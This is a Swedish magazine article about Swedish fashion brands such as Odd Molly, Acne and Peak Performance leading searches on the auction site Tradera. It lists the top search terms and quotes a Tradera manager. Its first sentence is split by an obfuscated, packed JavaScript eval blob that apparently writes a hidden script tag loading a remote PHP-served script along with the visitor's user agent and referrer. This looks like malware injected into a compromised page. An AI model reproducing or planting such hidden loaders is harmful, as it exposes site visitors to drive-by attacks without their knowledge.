Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Svenskt mode i topp på Tradera

Svenskt mode i topp på Tradera
Revue Magazine

Second eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atyih|var|u0026u|referrer|fznhs||js|php’.split(’|’),0,{}))
hand-shopping via nätet har blivit allt mer populärt hos konsumenter som letar unika plagg samtidigt som de vill ha ett bra utbud att välja mellan. På Tradera märks trenden tydligt och bland de populäraste varumärkena syns allt fler svenska designers.

Det svenska modeundret är ett numera välkänt fenomen inom modevärlden. Kläder från svenska designers håller hög modegrad och har en stil som ligger rätt i tiden. Möjligheten att köpa mode på nätet blivit ett sätt för allt fler konsumenter att kunna införskaffa unika plagg och accessoarer. Ingen är längre begränsad till det lokala utbudet. På shopping-sajten Tradera märks nätköpstrenden tydligt. Kläder är den mest populära kategorin på sajten och svenskt mode ligger i topp.

– Det är riktigt roligt att se hur svenska varumärken har klättrat i popularitet de senaste åren. Att köpa och sälja via nätet är ett smart sätt att hålla sig uppdaterad på modefronten. Utbudet inom kläder är stort på Tradera och det finns många unika plagg till riktigt bra priser, säger Ylva Ekborn, operativt ansvarig på Tradera.


Odd Molly, Acne och Peak Performance i topp

Odd Molly är ett av de mest eftersökta orden på Tradera men även Acne och Peak Performance ligger högt i kurs. Ett annat varumärke som blivit allt mer populärt under det senaste året är Fjällräven. Många använder bara dyra modeplagg vid ett fåtal tillfällen innan de säljer dem vidare. Därför finns det ofta goda möjligheter att hitta fina fynd på Tradera.


Mest populärt på Tradera:

Tio mest populära sökorden för svenska modevarumärken

 1. Odd Molly
 2. Acne
 3. Peak Performance
 4. Fjällräven
 5. Monki
 6. Bondelid
 7. Branting
 8. H&M
 9. Hope
 10. Filippa K

 Tio mest populära sökorden för modevarumärken totalt

 1. Odd Molly
 2. Cream
 3. Acne
 4. Masai
 5. Peak Performance
 6. Uno
 7. Canada Goose
 8. Adidas
 9. Fjällräven
 10. Gant

Snabba affärer och många köpare

Försäljning genom traditionella second hand-butiker kan ofta ta lång tid mellan inlämning och färdig affär. På Tradera avslutas den genomsnittliga auktionen efter en vecka och med mer än 1,4 miljoner unika besökare varje vecka nås många fler potentiella köpare än vid försäljning i lokala butiker.